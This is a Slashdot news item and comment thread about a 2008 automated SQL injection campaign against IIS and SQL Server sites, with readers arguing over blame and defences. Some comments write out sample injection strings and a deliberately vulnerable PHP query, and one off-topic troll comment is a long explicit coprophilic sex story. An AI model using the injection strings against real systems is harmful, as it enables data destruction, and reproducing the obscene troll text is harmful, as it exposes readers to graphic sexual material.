Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Half a Million Microsoft-Powered Sites Hit With SQL Injection

ScuttleMonkey posted more than 6 years ago | from the little-bobby-tables-strikes-again dept.

Security 222

Titus Germanicus writes to tell us that a recent attack has compromised somewhere in the neighborhood of 500,000 pages with a SQL injection attack. The vulnerability seems to be limited to Microsoft's IIS webserver and is easily defeated by the end user with Firefox and "NoScript." "The automated attack takes advantage to the fact that Microsoft's IIS servers allow generic commands that don't require specific table-level arguments. However, the vulnerability is the result of poor data handling by the sites' creators, rather than a specific Microsoft flaw. In other words, there's no patch that's going to fix the issue, the problem is with the developers who failed follow well-established security practices for handling database input. The attack itself injects some malicious JavaScript code into every text field in your database, the Javascript then loads an external script that can compromise a user's PC." Ignoring corporate spin-doctoring, there seems to be plenty of blame to go around.

cancel ×

222 comments

Sorry! There are no comments related to the filter you selected.

Microsoft's Official View of the Situation (4, Insightful)

eldavojohn (898314) | more than 6 years ago | (#23230430)

Ignoring corporate spin-doctoring there seems to be plenty of blame to go around.
Well, here [informationweek.com] 's a quote directly from Bill Sisk of Microsoft (seems to be in line with this blogger):

Microsoft (NSDQ: MSFT) on Friday found itself trying to clarify that it has nothing to do with the poor coding practices that have enabled a massive SQL injection attack to affect Web sites using Microsoft IIS Web Server and Microsoft SQL Server. "The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net, or Microsoft SQL technologies," said Bill Sisk, a communications manager at Microsoft, in a blog post. "SQL injection attacks enable malicious users to execute commands in an application's database." Sisk said that to defend against SQL injection attacks, developers should follow secure coding practices.
So if you want Microsoft's side of the story, they can't help it that people use bad coding practices.

As a coder, I don't agree with that. You make a tool/language/framework for developers, you better make it idiot proof. Example: C is far from idiot proof (seg fault!) but it's fast. Stupid fast. Unfortunately for C, there are more stupid coders out there like me than genuis coders out there like ... Donald Knuth. So you will see Java rise in popularity without ever being able to live up to speed of C.

Wow, for flaim retardant reasons, take the above paragraph as my meager opinion.

Re:Microsoft's Official View of the Situation (2, Insightful)

duplicate-nickname (87112) | more than 6 years ago | (#23230492)

So, I suppose all of the LAMP sites out there vulnerable to SQL injection are the fault of Microsoft too?

http://www.google.com/search?hl=en&q=site%3Asecurityfocus.com+php+sql+injection [google.com]

Re:Microsoft's Official View of the Situation (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#23230612)

A few years ago, while browsing around the library downtown, I had to take a piss. As I entered the john, a big beautiful all-American football hero type, about twenty five, came out of one of the booths. I stood at the urinal looking at him out of the corner of my eye as he washed his hands. He didn't once look at me. He was "straight" and married -- and in any case I was sure I wouldn't have a chance with him.

As soon as he left, I darted into the booth he'd vacated, hoping there might be a lingering smell of shit and even a seat still warm from his sturdy young ass. I found not only the smell but the shit itself. He'd forgotten to flush. And what a treasure he had left behind. Three or four beautiful specimens floated in the bowl. It apparently had been a fairly dry, constipated shit, for all were fat, stiff, and ruggedly textured. The real prize was a great feast of turd -- a nine inch gastrointestinal triumph as thick as a man's wrist. I knelt before the bowl, inhaling the rich brown fragrance and wondered if I should obey the impulse building up inside me. I'd always been a heavy rimmer and had lapped up more than one little clump of shit, but that had been just an inevitable part of eating ass and not an end in itself.

Of course I'd had jerkoff fantasies of devouring great loads of it (what rimmer hasn't?), but I had never done it. Now, here I was, confronted with the most beautiful five-pound turd I'd ever feasted my eyes on, a sausage fit to star in any fantasy and one I knew to have been hatched from the asshole of the world's handsomest young stud.

Why not? I plucked it from the bowl, holding it with both hands to keep it from breaking.

I lifted it to my nose. It smelled like rich, ripe limburger (horrid, but thrilling), yet had the consistency of cheddar. What is cheese anyway but milk turning to shit without the benefit of a digestive tract? I gave it a lick and found that it tasted better then it smelled. I've found since then that shit nearly almost does. I hesitated no longer. I shoved the fucking thing as far into my mouth as I could get it and sucked on it like a big brown cock, beating my meat like a madman. I wanted to completely engulf it and bit off a large chunk, flooding my mouth with the intense, bittersweet flavor. To my delight I found that while the water in the bowl had chilled the outside of the turd, it was still warm inside. As I chewed I discovered that it was filled with hard little bits of something I soon identified as peanuts. He hadn't chewed them carefully and they'd passed through his body virtually unchanged. I ate it greedily, sending lump after peanutty lump sliding scratchily down my throat. My only regret was the donor of this feast wasn't there to wash it down with his piss. I soon reached a terrific climax. I caught my cum in the cupped palm of my hand and drank it down. Believe me, there is no more delightful combination of flavors than the hot sweetness of cum with the rich bitterness of shit. Afterwards I was sorry that I hadn't made it last longer. But then I realized that I still had a lot of fun in store for me. There was still a clutch of virile turds left in the bowl. I tenderly fished them out, rolled them into my hankercheif, and stashed them in my briefcase.

In the week to come I found all kinds of ways to eat the shit without bolting it right down. Once eaten it's gone forever unless you want to filch it third hand out of your own asshole -- not an unreasonable recourse in moments of desperation or simple boredom.

I stored the turds in the refrigerator when I was not using them but within a week they were all gone.

The last one I held in my mouth without chewing, letting it slowly dissolve. I had liquid shit trickling down my throat for nearly four hours. I must have had six orgasms in the process. I often think of that lovely young guy dropping solid gold out of his sweet, pink asshole every day, never knowing what joy it could, and at least once did,bring to a grateful shiteater.

Re:Microsoft's Official View of the Situation (0)

MightyMartian (840721) | more than 6 years ago | (#23230786)

No kidding. There are lots of things to blast Microsoft over, but to blast them over a common vulnerability that can be found on virtually every platform out there, and that has everything to do with crappy coding practices and a lack of understanding of why feeding HTML form input straight into a SQL query is so... fucking... bad...

I'd like to challenge the GP as to what particular set of tools alterations he would make to make injection attacks impossible.

Re:Microsoft's Official View of the Situation (4, Informative)

Dekortage (697532) | more than 6 years ago | (#23230928)

Well, to quote from the Hackademix FAQ on this issue [hackademix.net] ... "Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts. There's no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well. SQL injections, and therefore these infections, are caused by poor coding practices during web site development. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site."

Re:Microsoft's Official View of the Situation (1)

pembo13 (770295) | more than 6 years ago | (#23230810)

No, they are the fault of Linux obviously. Isn't that the normal assertion?

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23230516)

Flame retardant, eh?
Didn't think of Troll retardant, though!

LINUX GETS HAXXED DAILY BUT IT SUX AND THERE IS NOT 1/2 million Gnu/Linux servers out there because it sucks etc etc...

But really, though. Most smart databases should include some basic SQL injection protection. Its not like its a new concept. Using the same idea of C vs. Java, they should at least have easier to implement sql injection protection (input parsing) or limit the amount of commands coming in though the web app to minimize ammount of damage done.

Re:Microsoft's Official View of the Situation (3, Insightful)

techno-vampire (666512) | more than 6 years ago | (#23230518)

You make a tool/language/framework for developers, you better make it idiot proof


Why? It's not their responsibility to see to it that you can't write bad code for their program any more than it's the responsibility of car manufacturers to build cars that can't crash no matter how they're driven. There's only so much MSFT can do to protect lusers against their own stupidity, and if badly trained developers write vulnerable code, it's their own damned fault. I'm no Microsoft fanboi, but even I only bash them when they deserve it.

Re:Microsoft's Official View of the Situation (1)

Nefarious Wheel (628136) | more than 6 years ago | (#23230608)

any more than it's the responsibility of car manufacturers to build cars that can't crash no matter how they're driven

Ref. "Unsafe at any speed" (R.Nader) and contrasting opinion "Safe at any speed" (L.Niven). The latter story was deliberate satire. Flying your car into a Roc can be inconvenient.

Re:Microsoft's Official View of the Situation (2, Interesting)

Cal Paterson (881180) | more than 6 years ago | (#23231256)

Ref. "National Highway Traffic Safety Administration" [wikipedia.org] .

I'm aware this is pretty tangential, but I found it interesting that the Corvair was eventually rated to be a pretty reasonable car by the government body that Nader's book created.

Re:Microsoft's Official View of the Situation (2, Insightful)

0racle (667029) | more than 6 years ago | (#23230528)

Do you post something similar when it's a PHP app on Apache being exploited with a SQL injection and the PHP authors say it's not their fault a whole bunch of their users are idiots?

Microsoft provides a platform, that platform has problems, but in this case the platform had nothing to do with what happened. This rests entirely on web developers who didn't bother to do things correctly.

Re:Microsoft's Official View of the Situation (2, Interesting)

peragrin (659227) | more than 6 years ago | (#23230782)

While I understand that why is it only MSFT IIS and MS SQL that's affected. If apache and MS SQL was being attacked and it has happened then i could fully understand it, but only MS IIS, MS SQL sites are affected. while the flaw may not be MSFT's sole fault how could 500,00 people setup a server wrong including the DHS? Maybe MSFT's history of poor coding and security practices lead to unsafe default options? security should always be over applied and then removed in layers.

Security like clothing works best in layers. You can always add a layer but you can only remove so many. prepare for an Arctic winter to start with, and you will have everything you need for the beach.

Re:Microsoft's Official View of the Situation (3, Insightful)

dedazo (737510) | more than 6 years ago | (#23230576)

As a coder, I don't agree with that. You make a tool/language/framework for developers

So stock Java protects me from things like "SELECT * FROM users WHERE Name = 'eldavojohn'; DELETE FROM orders", correct?

Wait, it doesn't. Neither does PHP or Python or Perl.

So I guess you can spin it as this somehow being Microsoft's fault, and Slashdot can post it again (and maybe again tomorrow FTW), deliberately confusing pages vs sites and using titillating article titles and editorial bylines about how corporate spin is "bad".

That doesn't change the fact that this is an application vulnerability, much like the endless stream of exploits against applications like phpBB that run on Linux and Apache.

But hey, it's all in the name of freedom and increased ad revenue, right?

Re:Microsoft's Official View of the Situation (3, Informative)

Lobster Quadrille (965591) | more than 6 years ago | (#23230674)

Actually, PHP's mysql engine won't run that query- you cannot execute more than one query in a single mysql_query() call.

There are plenty of ways around it, but your query will fail.

Re:Microsoft's Official View of the Situation (1)

dedazo (737510) | more than 6 years ago | (#23230860)

you cannot execute more than one query in a single mysql_query() call

...is that an actual feature?

Seriously though, does it prevent you from running more than one *statement*, or a query *and* a DDL statement together? I guess that would be impressive.

I use mostly C# and MSSQL, and I routinely write stored procs that return multiple datasets, which wouldn't be a problem in this case, but would PHP prevent me from running an ad hoc statement that returns more than one resultset at a time? As far as I know I can do that with the SqlClient in .NET, but I graduated from the inline SQL happy club about a decade ago so I wouldn't really know.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23230746)

So stock Java protects me from things like "SELECT * FROM users WHERE Name = 'eldavojohn'; DELETE FROM orders", correct?

Wait, it doesn't. Neither does PHP or Python or Perl.
Perl does.* PHP does.* I'd be extremely surprised if Python doesn't.* No idea about Java.

Maybe you should check your facts next time.

* Of course, it's not really meaningful to talk about a language protecting you from SQL injections; it's the database library that decides whether to send SQL to the database or not. I'm talking about the most popular libraries here (e.g. Perl's DBI).

Re:Microsoft's Official View of the Situation (1)

Chokolad (35911) | more than 6 years ago | (#23230856)

> * Of course, it's not really meaningful to talk about a language protecting you from SQL injections; it's the database library that decides whether to send SQL to the database or not. I'm talking about the most popular libraries here (e.g. Perl's DBI).

And this is differnt from Microsoft offerings how?

Re:Microsoft's Official View of the Situation (1)

mingot (665080) | more than 6 years ago | (#23230988)

Holy shit, you mean if I use taint mode in perl this can't happen to me? Or mysql_real_escape_string in PHP? Just like if I used paramterized queries in C# I can also be similarly NOT fucked?

Re:Microsoft's Official View of the Situation (1)

lorenzo.boccaccia (1263310) | more than 6 years ago | (#23230934)

well, actually php has a stupid monkey mode where it will escape input strings not matter what.
It's broken, it's restrictive for normal users, and is a bad idea in the same way that forgiving developer for using bad html was, but it's there. never used it, but I know because of some bug that it was introducing in an unrelated application.
php magic quotes [google.it]
note that I'm NOT sustaining that this is a good idea.

Re:Microsoft's Official View of the Situation (2, Funny)

Qzukk (229616) | more than 6 years ago | (#23231128)

It\\'s broken, it\\\\\'s restrictive for normal users, and is a bad idea in the same way that forgiving developer for using bad html was, but it\'s there. never used it, but I know because of some bug that it was introducing in an unrelated application.
Magic quotes is the absolute coolest thing since sliced arrays, or my name isn\\'t Jeffery O\\\\\\\\\\\\\\\\'Donnel!

Re:Microsoft's Official View of the Situation (4, Interesting)

Sancho (17056) | more than 6 years ago | (#23231084)

As others have posted, it's pretty easy to prevent multiple instruction SQL injection. That's a function of the database driver, which Microsoft controls.

It's much harder to prevent injection of additional parameters e.g. typing ' or '1'='1 into the text box--that's something that will be language and developer dependent. From my very brief scan of the details of this vulnerability, it looks like it would have been prevented if Microsoft had disallowed multiple statements in the driver.

This page supports my interpretation. [hackademix.net] I note, specifically:

Attackers carefully weighted the easiest spot, being a combination of

        * ASP classic, due to the poor coding standards among the average VBScripters who hardly known about prepared statements (even though they are supported)
        * ADO as the DB client layer, allowing stacked queries (multiple SQL statements together in a single string), which are not supported, for instance, by JDBC or by the mysql_query() PHP API
        * Microsoft SQL Server, because its Transact SQL supports a rich feature set including loops, metadata enumeration and Dynamic SQL (crucial for generalization), and because itâ(TM)s the most common ASP database back-end with such high-end features.
Apparently, if stacked queries weren't allowed, this wouldn't nearly so easy to exploit.

Re:Microsoft's Official View of the Situation (2, Insightful)

dedazo (737510) | more than 6 years ago | (#23231440)

it looks like it would have been prevented if Microsoft had disallowed multiple statements in the driver.

So what you are saying is that (and quoting the article you reference) Microsoft is at fault for providing these "high end features"? Even considering that it's not necessary to write sloppy VBScript code, and that it's ridiculously easy to use ADO to put together parameterized database commands, regardless of how many resultsets they are supposed to return?

And that the lack of that feature is actually an advantage for platforms like PHP and Perl? I'm curious, is the lack of that feature the reason for the multiple and well-documented injection attacks against LAMP applications? Or is it something else?

You will forgive me here if I imagine for a second what the general sentiment would be if the PHP MySQL driver actually provided this useful time- and bandwidth-saving feature while ADO/ADO.NET didn't. You would be telling me that it's the developers' fault, since all they need to do is write half-decent code that uses simple and well-documented features in the DB framework that prevent exposure to injection attacks. The PHP folks would not to blame, and in fact it would be so cool of them to out-innovate Microsoft.

Re:Microsoft's Official View of the Situation (1)

bit trollent (824666) | more than 6 years ago | (#23230750)

C# allows for SQL parameters, which render sql injection all but impossible in most cases. It doesn't require that you use them, but makes them painfully easy to use.

By the way I have been forced to use a C# framework that was so jacked up that I ended up with no choice but to allow sql injection vulnerabilities. I got around this by making sure that every time I had to do that I would make sure that the input came from server side code which read an "int" and then converted it to a string to build the sql injection vulnerable command.

Par for the course, this framework was forced down my throat by someone with more seniority but far less common sense and skill.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23231096)

Since I have writen oh say 2000 web enabled forms in the last 10 years in ASP PHP ASP.Net JSP and ColdFusion I can simple say that yes you can SQL Inject all of them.

And yes C# has parameters but so does ASP if you use ADOVBS. There really is no excuse for not escaping inputs seriously form validation should always be done regardless. You might as well blame browser makers for allowing people to put semicolons into text boxes at all.

Re:Microsoft's Official View of the Situation (3, Insightful)

Sigma 7 (266129) | more than 6 years ago | (#23230752)

As a coder, I don't agree with that. You make a tool/language/framework for developers, you better make it idiot proof. Example: C is far from idiot proof (seg fault!) but it's fast.
A seg fault is a form of idiot proofing - it prevents rogue C-style pointers from ruining the system. The absence of seg fault means your program is overwriting various locations in memory, which potentially causes the system to crash.

If you need access to locations of memory normally protected by a seg-fault, your operating system normally provides a means to do so.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23230924)

So if you want Microsoft's side of the story, they can't help it that people use bad coding practices.

As a coder, I don't agree with that. You make a tool/language/framework for developers, you better make it idiot proof.
What are you, stupid? It is not Microsoft's, or anyone else's, fault that there are bad programmers in the world. It is not the fault of a language if someone using that language doesn't know what they are doing. People who describe themselves as "coders" might fall into the category of programmers who don't know what they're doing. I don't just write code, I design and develop applications. Much of what I do is research. I take it upon myself to learn about the security implications of what I'm doing and how to protect my applications. A SQL injection attack is just about the most widely-spread vulnerability online, and it's due in large part to a lot of the people like you see on any web development forum like the one attached to w3schools.com just copying and pasting PHP code around with no clue as to what anything does or why it does it.

There is absolutely no need or use in this world for an "idiot-proof" programming language. Programmers are expected to be people who are not idiots, at least when it comes to using computers (as opposed to dating). If you need an "idiot-proof" programming language in order to do decent work as a "coder", then save the rest of us programmers a future headache and find something else to do with your time.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23231068)

You make a tool/language/framework for developers, you better make it idiot proof.

Hmm.. how about this instead:

If you are an idiot, then don't try to develop applications.

Really, if you are going to criticize the framework because of stupid developers, then you could probably lay blame with most frameworks out there.

Dupe? (5, Informative)

TubeSteak (669689) | more than 6 years ago | (#23230440)

500 Thousand MS Web Servers Hacked
Posted by kdawson on Friday April 25, @11:48AM
from the scream-and-shout dept.
http://it.slashdot.org/it/08/04/25/1358234.shtml [slashdot.org]

Re:Dupe? (4, Interesting)

calebt3 (1098475) | more than 6 years ago | (#23230570)

At least this one is more accurate in saying 500,000 web pages and not servers.

Re:Dupe? (0)

Anonymous Coward | more than 6 years ago | (#23230680)

The article title says "sites", which I think is the same thing. But at least the summary is slightly more accurate

Re:Dupe? (1)

pfleming (683342) | more than 6 years ago | (#23231220)

You mean IIS can handle more than one site?

Re:Dupe? (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23230678)

FUCK DUPE FUCK

+25 insightful

Re:Dupe? (1)

Cheapy (809643) | more than 6 years ago | (#23230842)

/. has been quite good about dupes lately.

I think we can let it slide once and a while.

Dupe (1)

iamhigh (1252742) | more than 6 years ago | (#23230460)

Thought you could sneak it by at 5 o'clock, but I caught ya...

http://it.slashdot.org/article.pl?no_d2=1&sid=08/04/25/1358234 [slashdot.org]

Re:Dupe (1)

eneville (745111) | more than 6 years ago | (#23230690)

Nothing gets under your radar.

Just like viruses and worms, slashdot has it's share of dupes. Just like the number of people who posted here to complain that it's a dupe.

Dupe catching on /. has become almost and extreme sport.

Dupe? (0)

Anonymous Coward | more than 6 years ago | (#23230464)

Isn't this a dupe? I remember the same story from a couple of weeks back...?

Wow... (0, Redundant)

ActionDesignStudios (877390) | more than 6 years ago | (#23230466)

I've seen dupes and all on Slashdot, but this an extreme case. I think this was posted last week, and it wasn't even a good article to begin with. Grats?

This is typical for a dupe (2, Informative)

panaceaa (205396) | more than 6 years ago | (#23230748)

Actually, most dupes on Slashdot are a couple days apart like this one. After that they fail to be news and tend not to get reposted.

The extreme cases are actually measured in the years or hours. There's multiple cases of an article being duped 2-3 years later, especially when they're industry studies on how people use technology or occasionally about scientific discoveries. For the latter, it's often that a university announces they've done something and then publishes the results, which results in two very similar though arguably non-duplicative Slashdot articles.

On the other side, sometimes there's big news and an editor decides to get it out fast without reading the current front page. I've seen dupes within the same hour, but more likely they're 2-3 articles apart in the worst cases. This was one of the arguments for introducing the Slashdot subscription model, in fact: Subscribers have early access to upcoming articles and can tell editors that an upcoming article is a dupe. In many cases (but not all) the editor pulls the dupe before it gets pushed to the front page.

How to fix your SQL Injections (0)

Anonymous Coward | more than 6 years ago | (#23230476)

[quote]
Titus Germanicus writes to tell us that a recent attack has compromised somewhere in the neighborhood of 500,000 pages with a SQL injection attack. The vulnerability seems to be limited to Microsoft's IIS webserver and is easily defeated by the end user with Firefox and "NoScript".
[/quote]

Now, that makes sense. If you have an IIS installation, simply install Firefox and NoScript and you fix all your SQL injections!

Everyone's fault (1)

ais523 (1172701) | more than 6 years ago | (#23230478)

"is easily defeated by the end user with Firefox and "NoScript"." Well, that protects the end user from the compromised server, but not the compromised server from the compromising script. This is not really a vulnerability in IIS, but it is a design decision that means the compromising script can exploit vulnerabilities in badly-written webapps more easily, so it's slightly Microsoft's fault. It's mostly the fault of all the developers who don't know or don't care about SQL injection, though. The same sort of attack could work against any make of server (because it exploits vulnerabilities in the code running on that server), but would be less easy to automate. And of course, the final end-user-compromising vulnerability has to target the end user, who ought to be protected against malicious websites, but many of who won't be...

Shameless Hibernate Plug (4, Informative)

eldavojohn (898314) | more than 6 years ago | (#23230494)

You know, as an incompetent Java developer, I will take the time to explain why none of my web applications suffered from this.

I use Hibernate [hibernate.org] . I use it with Java, although I know it's now available for .NET.

A feature of Hibernate (aside from some efficient connection pooling and resource management like caching) is that you have to actually call a delete method to delete a row. Something like HibernateSession.delete(myObject); would have to be done. And while this might sound annoying or ruin some tools that are used to generate SQL statements, it protects me time and time again. Now, you can use HQL which is a bastardized version of SQL to generate similar things but, again, I think that you can't drop/delete in it (could be wrong, rarely use it).

Try passing part of an SQL string into an object property and then merge/save it into the HibernateSession. Doesn't do the SQL injection stuff the bad guys want it to. Of course, I still use regular expression common utilities to validate the input, but assuming you didn't do that ...

So why don't other people use Hibernate? Am I missing something about it that's bad?

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23230622)

It's not all that bad but it comes with it's own set of quirks, such as lazy-loading issues and degraded performance. Note I'm not saying it's all bad but as with every abstraction layer it can create it's own problems. I've done quite some consulting for projects which ran into troubles for blindly using Hibernate, just as this post shows problems created by blindly using ASP.Net. Hibernate is not a silver bullet.

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23230642)

Because it onerously bloats application size and complexity, severely degrades performance, and fills the SQL logs with garbage?

Re:Shameless Hibernate Plug (1)

gazbo (517111) | more than 6 years ago | (#23230658)

Because not everyone has swallowed the fashionable BS about ORM being the way ahead, and instead are happy with a pure relational model?

Re:Shameless Hibernate Plug (1)

Cyberax (705495) | more than 6 years ago | (#23230834)

I'm sorry. But what is 'relation model' you're speaking about?

ORM is just another way to work with database. It doesn't magically transform relative database into object database.

Re:Shameless Hibernate Plug (1)

ChadAmberg (460099) | more than 6 years ago | (#23230688)

Another group in my company is using Hibernate and absolutely hates it with a passion, due to all the bugs they have to work around. The lead architect who doesn't code likes it, but the other architects who still code don't, along with most of the programmers.

Re:Shameless Hibernate Plug (3, Insightful)

Cecil (37810) | more than 6 years ago | (#23230710)

I can't speak about Hibernate specifically, but I can tell you what my first concern would be. Database frameworks usually tend to have trouble dealing with complex database designs, and if they can deal with them they are invariably much slower and less efficient than a SQL statement could be.

Some of these complexity and efficiency issues can be resolved by partial denormalization of the database design, but again, that introduces inefficiency.

Basically, the use of a high-level framework like that introduces significantly more difficulty into the already difficult problem of performance optimization. And for most people, performance is a more immediate and obvious problem that needs solving as opposed to security.

Another problem in my opinion is that there approximately a million and one different database abstraction layers like Hibernate out there. The lack of standardization makes it very difficult for any of them to gain any sort of critical mass of developers and documentation the way SQL has.

LINQ/SQL and ADO.NET ENTITY FRAMEWORK (0)

Anonymous Coward | more than 6 years ago | (#23230962)

Aside from Hibernate ( which is ok ) there is LINQ (for SQL) and the ADO Entity Framework. Both are from MS and both are pretty good. The framework is in CTP and a few features are missing but I've tested the existing feature set under load and found it useful, solid, and the performance ok for not SQL Direct. LINQ is in production.

http://en.wikipedia.org/wiki/Language_integrated_query [wikipedia.org] [see LINQ for SQL down the page]
http://en.wikipedia.org/wiki/ADO.NET_Entity_Framework [wikipedia.org]

I think Hibernate (for Java) is pretty good, easy to use. I found some of the problem a pain (the old compound key thing irked me). But it is suprising home many people don't like it anymore.

Re:Shameless Hibernate Plug (1)

njcoder (657816) | more than 6 years ago | (#23231108)

I agree. Databases are complex for a reason. These tools seem to try and hide this complexity through abstraction. In doing so you lose access to some of the great features of the underlying database, which may be fine if you're using some crippled version of a database, but with more advanced databases you're locking yourself out of some great db features.

Re:Shameless Hibernate Plug (1)

Sancho (17056) | more than 6 years ago | (#23231148)

Some of these complexity and efficiency issues can be resolved by partial denormalization of the database design, but again, that introduces inefficiency.
Which efficiency does this reduce? Normally, from a database perspective, normalizing increases data integrity at the expense of database efficiency, doesn't it?

Database frameworks can often deal with complex databases for read operations which, in this day and age, tend to be a high percentage of the operations that a database performs. They're probably worth using for read operations, and write operations where good performance isn't a requirement. You can always fall back on raw SQL (with stringently checked values) in order to gain performance where it's needed.

Re:Shameless ORM Bashing (1)

Foofoobar (318279) | more than 6 years ago | (#23230712)

Yeah and ORM loads more data than you will need or use in comparison to a properly formed query moved to a separate db layer which has all the benefits of ORM with none of the bloat.

Re:Shameless ORM Bashing (0)

Anonymous Coward | more than 6 years ago | (#23231408)

Hibernate supports lazy loading in which case you can specify exactly what it has to load up front and then if you need more stuff later it will load it then.

There's problems with that approach as well, but it largely eliminates the bloat problem.

As a complete aside, I don't believe hibernate sanitizes inputs for you, so it's still possible to perform injection attacks on it

Re:Shameless Hibernate Plug (1)

bottlecaps4u (1280882) | more than 6 years ago | (#23230916)

I'd like to point out that SQL injection attacks are not limited to IIS web servers. Not properly escaping SQL statements in PHP can lead to SQL injection attacks, and the same problem exists in python, in perl, and in a multitude of languages. Not properly creating limited-access users aggravates the situation as well.

Using Hibernate helps developers by providing a robust persistence layer. But it is important to note the role of this layer -- the persistence layer is simple an abstraction from the underlying SQL. For many software projects, it is a good idea to have a persistence layer since having this layer can provide a measure of protection against SQL injection attacks, but at some point in there code, raw SQL needs to be issued to the database.

It seems to me the point of the article is NOT that SQL injection attacks can occur, but rather MSSQL stored procedures to allow automated attacks scripts to run.

Re:Shameless Hibernate Plug (1)

Threni (635302) | more than 6 years ago | (#23230974)

> I'd like to point out that SQL injection attacks are not limited to IIS web servers.

Shush! Give the Slashdot anti-MS weirdos their two minutes hate. It helps take their mind off the fact that Microsoft's database products are powerful and easy to use.

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23231012)

SO its better if they didn't allow you to discover the database with sql? (clearly nobody needs that)
Or is it better if they didn't allow you to submit adhoc raw querys to sql?

Up and down this is an luser problem not a microsoft one and it seems everyone with a brain here has already agreed.

Bad code (unescaped /parameterized parameters)
Bad DBA (permissions set so anything can run on the database)
Bad Webmaster (website talking to sql with with to many permissions)

Just because some people can't hold a gun without shooting themselves in the foot doesn't mean you get to take mine away.

Re:Shameless Hibernate Plug (1)

Tim C (15259) | more than 6 years ago | (#23230976)

Never mind Hibernate (which is great, but like all tools & frameworks only good as far as it goes and hardly faultless), just use PreparedStatemtents and the setXXX() methods and never worry about SQL injection again. This has been available since JDK1.2 ferchrisakes.

Seriously, the fact that in 2008 any site created by a "professional" web developer is vulnerable to SQL injection is little short of sickening.

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23231106)

You don't even need to use hibernate - just using Java with raw JDBC PreparedStatements (that's a parameterized statement for non-Java folks) protects you fine from injection attacks. I would think most languages have something like this. Who concatenates parameters into SQL strings anymore? Well, I guess at least 500,000 sites do.

Dupe Dance (2, Informative)

jd (1658) | more than 6 years ago | (#23230520)

Yay! We get a re-run of one of the more non-story events of recent times. The problem was spotted very quickly by IIS admins, as was noted before, and it's half a millon pages, not half a million sites. Well, unless all sites have one page and I've only been thinking they used hypertext links to more of their own content. It's unclear what percent of those sites were IIS, what were Apache (an easy server to misconfigure), and what were other web servers. Blaming it on IIS is easy, and there probably is some truth to the allegation that IIS has flaws when it comes to SQL support, but this time they almost (I said almost) have justification in crying foul when Microsoft gets blamed.

What I don't get, though, is not only does this dupe the earlier story, it dupes ALL OF THE ERRORS as well. Sheesh!

Had a problem once.. (1)

thewils (463314) | more than 6 years ago | (#23230526)

...with a user wanting to inject images from other websites into my pages.
I solved it quite nicely by translating any opening bracket to "ampersand-gt-;" (you know what I mean) and any urls were totally ignored after that.

It's a well known bug in IIS. (1)

dameron (307970) | more than 6 years ago | (#23230538)

A buffer overflow in the dupcheck module leads to privilege elevation.

You can spot if pretty easily if you reload a backup from 4/25 and your web page keeps spamming out the same offensive links.

How does Apache avoid this? (1)

hellfire (86129) | more than 6 years ago | (#23230574)

I'm not knowledgeable to answer this, but I know there has to be a good "in your face, Microsoft" reason why this doesn't hit servers like Apache? They point the finger at the websites and say "UR DOIN IT RONG!" and blame them. And yet, apache users don't have to worry about this. Why? That's the argument I want to have.

Re:How does Apache avoid this? (0)

Anonymous Coward | more than 6 years ago | (#23230644)

Because it's a Microsoft product, and hence must be the root of all evil. Let's disregard how stupid the website developer is for not sanitizing SQL queries and blame MS instead!

Re:How does Apache avoid this? (1)

graveyhead (210996) | more than 6 years ago | (#23230740)

No such "in your face" reason exists. It's not Apache that matters here (or IIS I'm guessing), it's the database and interacting with it via some server side language.

So when someone appends a string to a query directly from a CGI variable (in an URL, after a questionmark - those are CGI vars ... blah.cgi?bar=baz) this can be used as an attack vector regardless of the platform. This error is super easy to make in PHP for example:

mysql_query('SELECT * FROM mytable WHERE foo = " . $_REQUEST['foo']);

What's happening here is that the user value for "foo" is being used as the WHERE clause of a SQL query. Looks nice and innocent, right?

Well, guess what if someone hits your site with this:

blah.cgi?foo=(DELETE FROM MYTABLE)

Result: byebye database.

Fixing this is known as "sanitizing inputs" and there's many ways to do it.

What this IIS thing sounds like to me is some specific application that happens to use IIS / MSSQL does not sanitize. Therefore vulnerable.

Re:How does Apache avoid this? (2, Informative)

Sancho (17056) | more than 6 years ago | (#23231174)

That's close.

http://hackademix.net/2008/04/26/mass-attack-faq/#comment-7742 [hackademix.net] has a decent explanation of why this is primarily hitting IIS. SQL injection is common to many platforms, but Microsoft's database driver has some features that made it particularly easy to generalize the exploit. Specifically, prior knowledge of the table layout was apparently unnecessary to create the exploit, meaning that it was easy to hit a large number of websites in a short period of time.

Re:How does Apache avoid this? (1)

mingot (665080) | more than 6 years ago | (#23230768)

Not really because apache is just as susceptible to this as any other web server.

Re:How does Apache avoid this? (1)

jd (1658) | more than 6 years ago | (#23230772)

People have done SQL Injection attacks on Apache servers and probably most other servers. It seems as though this flaw is made easier on a misconfigured server, but you can misconfigure any software that uses a configuration file. It's easiest when the configuration isn't validated correctly, or when it's impossible to determine all invalid cases, or when a case may be invalid only under certan circumstances. All of these are bound to crop up on something like Apache.

Besides, there must be bugs elsewhere, or the article writer wouldn't have repeated an already-corrected folly of confusing pages with servers.

Re:How does Apache avoid this? (1)

blowdart (31458) | more than 6 years ago | (#23230938)

